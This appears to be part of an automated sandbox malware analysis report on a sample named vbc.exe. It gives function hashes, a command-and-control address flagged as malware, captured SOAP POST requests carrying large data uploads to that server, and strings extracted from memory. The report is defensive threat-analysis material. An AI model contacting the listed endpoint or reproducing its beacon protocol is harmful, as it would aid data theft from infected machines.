Opcode Fuzzy Hash: 1a7b2e3c259babae3c6d7b9e07dbf93133c5f2543555d73841e23e7579716c8d
Instruction Fuzzy Hash: 69F055723082858FCF05AB71A4184BC7BA2EF8A21A32C047FC18EC6311CE378016CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0736FF88 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6663a8ad1541447e7cdb7d79f8b676ac45d104afd7801a430cf7ba68e82ad638
Instruction ID: e4bfc9b83788bf69ae2827c61dc2fd39b07b2463c466fa7d7d8b36040b8c9c16
Opcode Fuzzy Hash: 6663a8ad1541447e7cdb7d79f8b676ac45d104afd7801a430cf7ba68e82ad638
Instruction Fuzzy Hash: 0AE092B671532307AB2862B5A50D2A6779A9BC2254B05C42AEA0EC7B85EF74E80146A0

Uniqueness

Uniqueness Score: -1.00%

Function 07368600 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d49e9c4a5d688867858589de2d5cbf093a612380c708f776b0fa6a66c3ac6a
Instruction ID: 93edd0a41f2f58cf4a69c5b33118686b1b78a21e329c9333e2dae94410f56fa1
Opcode Fuzzy Hash: 67d49e9c4a5d688867858589de2d5cbf093a612380c708f776b0fa6a66c3ac6a
Instruction Fuzzy Hash: 30D01262345235673B5071FA28051FA72CD49880B57088872EA4CC3545F955C85112D2

Uniqueness

Uniqueness Score: -1.00%

Function 0736C6E1 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5adb0f7d20a80683ff8681f446009b8c42aea9cf6112ff14b775c503ecc453f
Instruction ID: 42d7625a4a54a8f64c82b4cc20920663afdc5de4e73012164399a4ef5c6f9a93
Opcode Fuzzy Hash: b5adb0f7d20a80683ff8681f446009b8c42aea9cf6112ff14b775c503ecc453f
Instruction Fuzzy Hash: F0E012333046458F9B159BA4E4455BEB7E7FBC9225318486DD18EC3300CB37A4079B11

Uniqueness

Uniqueness Score: -1.00%

Function 07368E60 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17db9f6446d7e4a23afc2627cef694956f568aa460bc983e6ed173e3a8269f24
Instruction ID: 10923e3f6741196943ed807dfc147954c213e32fc98232e9d61afe54f9ffa6ee
Opcode Fuzzy Hash: 17db9f6446d7e4a23afc2627cef694956f568aa460bc983e6ed173e3a8269f24
Instruction Fuzzy Hash: A4D05E253087F00FC7022B28B429268BFB1EA8B1417A584EBD582D7356DA205C1AA392

Uniqueness

Uniqueness Score: -1.00%

Function 07364A88 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef928228bdc3f6da44b34ec9727cc5fe0fb33e64b4eede22bf90b01a6f37a356
Instruction ID: 578d0974755fb55b9c3fc135ac9d844cc7d8dd11234335b4f74aaa4bc30c391b
Opcode Fuzzy Hash: ef928228bdc3f6da44b34ec9727cc5fe0fb33e64b4eede22bf90b01a6f37a356
Instruction Fuzzy Hash: 0ED0A7343105148FC6009718E408D9A77E9EB4CB21B014096F905C7360CEB1EC018BC4

Uniqueness

Uniqueness Score: -1.00%

Function 073684F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.379178943.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7360000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab504fdb7c45043503690f34d6c34e7bd6c8f966e5098c6472fc6acf00e729b1
Instruction ID: e2d1d1bdcf46580d98ee278e459d5a58463dbe719b2d79cb6e1302d86fe5ea36
Opcode Fuzzy Hash: ab504fdb7c45043503690f34d6c34e7bd6c8f966e5098c6472fc6acf00e729b1
Instruction Fuzzy Hash: B3C04C7240A3D18FCF174F3055154953F30791328535901D6D4D59A262C72A4706CB51

Uniqueness

Uniqueness Score: -1.00%

Source: http://185.222.58.90:17910	Avira URL Cloud: Label: malware
Source: http://185.222.58.90:1	Avira URL Cloud: Label: malware
Source: http://185.222.58.90:17910/	Avira URL Cloud: Label: malware

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1108528Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1108520Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1107783Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1107775Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ok9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:1
Source: vbc.exe, 00000004.00000002.379436483.0000000007421000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:17910
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:17910/
Source: vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:179104
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348363338.00000000056A5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.474849036.00000000056D5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.483489857.00000000056D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://forms.rea
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1
Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.ado/1_
Source: vbc.exe, 00000004.00000003.377169989.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377236233.000000000D2C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.377186734.000000000D2C0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.366510707.000000000D2B1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g_
Source: vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cobj_
Source: vbc.exe, 00000004.00000002.379532591.00000000074CE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.r
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.a
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484560508.000000000734A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
